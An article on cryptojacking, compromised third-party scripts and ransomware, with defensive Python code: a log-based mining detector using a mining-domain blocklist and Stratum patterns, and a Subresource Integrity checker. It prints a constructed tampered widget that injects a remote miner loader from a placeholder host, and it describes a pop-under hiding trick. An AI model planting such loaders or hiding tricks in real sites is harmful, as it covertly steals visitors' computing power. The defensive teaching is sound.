Profile of a Cybercriminal: Cryptocurrency Attacks

It’s true that data has value (look at Google’s and Facebook’s business models), but blockchain and cryptocurrency take that idea literally. The “crypto” in cryptocurrency is meant literally: for its hordes of users, cryptography supplies properties a currency must have, such as proof of ownership and transferability. Data’s value, by contrast, comes from the information it holds.
The cryptocurrency model has worked so far, and so, naturally, people want to steal it as much as they do data or paper money. An attacker might smash and grab an organization’s data, but cryptocurrency attacks are often subtler and of a different kind, and they can hit a company that holds no cryptocurrency at all. Learning to recognize these attacks is vital to a proper security posture.

A Blockchain Breed of Cyber Threat

Thanks to blockchain’s decentralized design, companies will encounter a type of attack that isn’t outright theft of data, a DDoS, or anything similarly brash. It turns on the idea that defines blockchain: the computing work that validates transactions and secures the chain isn’t done by a central server. It’s shared among participants, ideally ordinary people who put their own computers to work supporting the network.
But attackers turn innovations into weapons. They’ve begun designing attacks that hijack remote PCs, corporate endpoints included, and conscript them into mining for a chain. This cryptojacking skims a small, hard-to-trace slice of CPU time, even from an employee’s mobile device, and feeds it to a mining pool, which pays the resulting cryptocurrency into a wallet the attacker controls.
Employees don’t even have to download anything; merely browsing the wrong website is enough. Coinhive, for example, was a popular JavaScript Monero miner that ran in the visitor’s browser, so a single site embedding it could draw CPU time from tens of thousands of PCs at once. Closing the tab did not always stop it: one documented trick opened a tiny pop-under window sized and positioned to hide behind the Windows taskbar, so CPU time kept being siphoned off after the visible window was closed.
For IT teams, defending against drive-by mining is possible with a two-pronged approach: DNS filtering plus network monitoring. The DNS filter is the first line of defense; it blocks the domains of known mining services (Coinhive and its successors) and of sites known to host them. A keyword blacklist such as “bitcoin” is a poor substitute: browser miners target CPU-friendly coins like Monero and do not announce themselves in hostnames. Monitoring then catches what the filter misses. Mining uses very little bandwidth, so watch for the miner’s characteristic traffic rather than raw volume: long-lived WebSocket or TCP connections to pool servers carrying Stratum JSON-RPC messages (methods such as login, job and submit), paired with sustained high CPU on the endpoint.
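The two checks above (block known mining domains, then look for Stratum traffic rather than bandwidth) can be run over logs as a first-pass detector. The script below is an added example, not code from the original article or from any product it names. The proxy log format, the sample log lines, the WebSocket frames, the IP addresses and the WALLET_ADDRESS placeholder are all constructed for the example; the two-domain seed list (Coinhive and its opt-in variant AuthedMine) stands in for a maintained blocklist.

```python
"""Flag likely cryptomining from proxy logs and captured WebSocket frames."""
import json
import re
from collections import defaultdict

# Assumption: an illustrative seed list. A real deployment loads a maintained
# blocklist of mining-service domains instead of these two names.
MINER_DOMAINS = {"coinhive.com", "authedmine.com"}

# Stratum JSON-RPC method names: Monero-style pools (login/job/submit) and
# Bitcoin-style pools (mining.subscribe/authorize/submit).
STRATUM_METHODS = {
    "login", "job", "submit",
    "mining.subscribe", "mining.authorize", "mining.submit",
}

# Constructed proxy log format (assumption):
#   <timestamp> <client_ip> <http_method> <host[:port]> <path> <bytes>
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<method>[A-Z]+)\s+"
    r"(?P<host>[^\s/:]+)(?::\d+)?\s+(?P<path>\S+)\s+(?P<bytes>\d+)$"
)


def host_matches_miner(host):
    """Exact or subdomain match against the mining-domain list."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in MINER_DOMAINS)


def is_stratum_message(payload):
    """True if a text frame looks like a Stratum JSON-RPC request or job response."""
    try:
        msg = json.loads(payload)
    except (ValueError, TypeError):
        return False
    if not isinstance(msg, dict):
        return False
    if msg.get("method") in STRATUM_METHODS and "params" in msg:
        return True
    # A pool's reply to "login" carries the first job rather than a method name.
    result = msg.get("result")
    return isinstance(result, dict) and "job" in result


def find_miners(proxy_lines, ws_frames):
    """Return {client_ip: [reasons]} for clients showing mining indicators.

    proxy_lines: iterable of log lines in the constructed format above.
    ws_frames:   iterable of (client_ip, text_payload) captured frames.
    """
    hits = defaultdict(set)
    for line in proxy_lines:
        m = LOG_RE.match(line.strip())
        if m and host_matches_miner(m["host"]):
            hits[m["client"]].add("known mining domain: " + m["host"].lower())
    for client, payload in ws_frames:
        if is_stratum_message(payload):
            hits[client].add("stratum json-rpc over websocket")
    return {client: sorted(reasons) for client, reasons in hits.items()}


# Constructed sample data (not real traffic).
SAMPLE_PROXY_LOG = [
    "2017-11-20T09:01:12Z 10.0.4.17 GET www.example.com /news 51233",
    "2017-11-20T09:01:13Z 10.0.4.17 GET coinhive.com /lib/coinhive.min.js 31840",
    "2017-11-20T09:01:14Z 10.0.4.17 CONNECT coinhive.com:443 / 0",
    "2017-11-20T09:02:40Z 10.0.4.22 GET cdn.example.com /jquery.min.js 87512",
    # Contains the keyword "bitcoin" but is a legitimate news site: a keyword
    # blacklist would block this while missing everything above.
    "2017-11-20T09:03:05Z 10.0.4.31 GET bitcoin-news.example.com /prices 20480",
]

SAMPLE_WS_FRAMES = [
    # Endpoint miner logging in to a pool (WALLET_ADDRESS is a placeholder).
    ("10.0.4.22", '{"id":1,"jsonrpc":"2.0","method":"login",'
                  '"params":{"login":"WALLET_ADDRESS","pass":"x","agent":"miner/1.0"}}'),
    # Pool reply carrying the first job (blob and target values are made up).
    ("10.0.4.22", '{"id":1,"jsonrpc":"2.0","result":{"id":"s1",'
                  '"job":{"blob":"0707...","job_id":"j1","target":"b88d0600"},"status":"OK"}}'),
    # Benign application traffic.
    ("10.0.4.31", '{"type":"ping"}'),
    ("10.0.4.31", "hello, not json"),
]

if __name__ == "__main__":
    for client, reasons in sorted(find_miners(SAMPLE_PROXY_LOG, SAMPLE_WS_FRAMES).items()):
        print(client, "->", "; ".join(reasons))
```

Run against the constructed sample, the detector flags 10.0.4.17 (fetched the miner library and opened a TLS connection to the mining domain) and 10.0.4.22 (a native miner speaking Stratum to a pool over WebSocket), while 10.0.4.31, the host that merely read a news site with “bitcoin” in its name, is left alone. Pair the network findings with endpoint CPU telemetry before acting: a domain hit alone may be a blocked fetch, and a Stratum login alone may be a developer’s test.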

Crypto Scam Defenses Combine Old and New

In a reversal, attacks might be launched from your network rather than against it. An employee might mine on a company laptop or, if especially malicious, use company resources such as the website to infect visitors’ PCs and mine coins on them. This may have been the case with the popular tech support tool LiveHelpNow, a widget embedded on thousands of customer websites to give their users easy access to support, which for a time also served a Coinhive script that mined Monero for whoever had inserted it.
The Zero Trust approach, achievable with software-defined networking tools, includes elements that help identify strange network behavior and also enforce least-privilege permissions for employees, restricting who can reach specific resources on the network. If LiveHelpNow had a rogue employee compromising its product, limiting who could change the code shipped to customers might have stopped them. The customers have a lesson too: a third-party script runs with the full privileges of the page that embeds it, so a Content Security Policy that restricts where scripts may load from and where they may connect, plus Subresource Integrity hashes on versioned scripts, limits what a compromised vendor script can do.
Organizations should also remember that not all cryptocurrency attacks are this subtle theft of processing power; there are also the noisier, devastating network breaches like those meant to steal data. The biggest ransomware attacks infiltrate the network and encrypt important files, announcing themselves by demanding a ransom in cryptocurrency to restore access. Classic defenses are effective against these events: firewalls, backups, encrypted connections, and patching.
Ransomware can easily make its way into the network when a remote employee connects to resources from an unmanaged device or over an untrusted Wi-Fi network, so enforcing VPN use is the bare minimum. Users shouldn’t be able to access resources without encryption, and firewalls help identify and block suspicious traffic. Finally, regular backups and patching go a long way toward making ransomware harmless. Backups kept offline, or otherwise out of reach of the infected hosts, make data ransoming pointless, while patching closes the holes worms spread through: WannaCry, which demanded payment in bitcoin, exploited an SMBv1 flaw (MS17-010) that Microsoft had patched two months earlier, and unpatched Windows 7 machines bore the brunt of it.
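Subresource Integrity is the customer-side control for the LiveHelpNow situation described above: the embedding page pins the hash of the widget build it reviewed, and a copy with extra code appended fails to load. The code below is an added example, not from the article or from LiveHelpNow; the widget body, the tampered copy, the vendor URL and the reserved name miner.invalid are constructed placeholders. It generates the integrity value and then mimics the browser’s verification rule, including two behaviours worth knowing: weaker hashes are ignored when a stronger one is listed, and an attribute with no recognised algorithm passes silently.

```python
"""Generate and verify Subresource Integrity (SRI) hashes for a vendor script."""
import base64
import hashlib
import hmac

# SRI permits only these algorithms; browsers enforce only the strongest one(s) listed.
STRENGTH = {"sha256": 1, "sha384": 2, "sha512": 3}


def sri_hash(body, algo="sha384"):
    """Return an integrity value such as 'sha384-<base64 digest>' for a script body."""
    if algo not in STRENGTH:
        raise ValueError("SRI allows only sha256, sha384 or sha512")
    digest = hashlib.new(algo, body).digest()
    return algo + "-" + base64.b64encode(digest).decode("ascii")


def parse_integrity(integrity):
    """Split an integrity attribute into (algo, digest) pairs, dropping unknown algorithms."""
    parsed = []
    for token in integrity.split():
        algo, _, rest = token.partition("-")
        if algo in STRENGTH:
            parsed.append((algo, rest.split("?", 1)[0]))  # spec allows a '?options' suffix
    return parsed


def verify_sri(body, integrity):
    """Mimic the browser's check.

    Only the strongest algorithm present is considered, and a match against any of
    its digests passes. If no recognised token exists the spec says the check passes,
    so a typo in the attribute silently disables SRI: audit the values, not just the
    presence of the attribute.
    """
    parsed = parse_integrity(integrity)
    if not parsed:
        return True
    strongest = max(STRENGTH[algo] for algo, _ in parsed)
    for algo, expected in parsed:
        if STRENGTH[algo] != strongest:
            continue
        actual = sri_hash(body, algo).split("-", 1)[1]
        if hmac.compare_digest(actual.encode(), expected.encode()):
            return True
    return False


def script_tag(src, body):
    """Emit the <script> tag a customer site would pin to one reviewed widget build."""
    return ('<script src="%s" integrity="%s" crossorigin="anonymous"></script>'
            % (src, sri_hash(body)))


# Constructed stand-ins for a support widget and a tampered copy of it. The
# tampered copy appends a loader for a miner script; miner.invalid is a reserved,
# non-resolving name used only as a placeholder.
ORIGINAL_WIDGET = b"(function(){window.supportWidget={open:function(){}};})();\n"
TAMPERED_WIDGET = ORIGINAL_WIDGET + (
    b"var s=document.createElement('script');"
    b"s.src='https://miner.invalid/m.js';document.head.appendChild(s);\n"
)
WIDGET_SRC = "https://vendor.example/widget-2.3.1.js"  # placeholder versioned URL

if __name__ == "__main__":
    pinned = sri_hash(ORIGINAL_WIDGET)
    print(script_tag(WIDGET_SRC, ORIGINAL_WIDGET))
    print("genuine copy passes:", verify_sri(ORIGINAL_WIDGET, pinned))
    print("tampered copy passes:", verify_sri(TAMPERED_WIDGET, pinned))
```

The caveat is that SRI only works when the vendor serves a fixed, versioned file; a widget that is regenerated on every request, as many support tools are, will fail the check on legitimate changes too. In that case the page’s Content Security Policy is the control that remains: a script-src that lists only the vendor’s host and a connect-src that does not allow arbitrary WebSocket destinations stop a miner from loading its library or reaching a pool, whatever the vendor ships.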

A Blockchain Re-education

Only a comprehensive security model, classically equipped but updated with training against this new foe, can claim confidence against cryptocurrency scams. From new kinds of attack to familiar ones serving an altered purpose, organizations should adopt a multilayered approach to put their concerns behind them. Educating employees is as vital here as it is for non-crypto attacks.
The decentralizing ideas behind cryptocurrency are about empowering individuals, but unfortunately the wrong individuals can feel empowered too. It’s useful to remind employees how to resist temptation and improve their habits, and to prepare networks for a younger generation of attacks that manipulate them in new ways.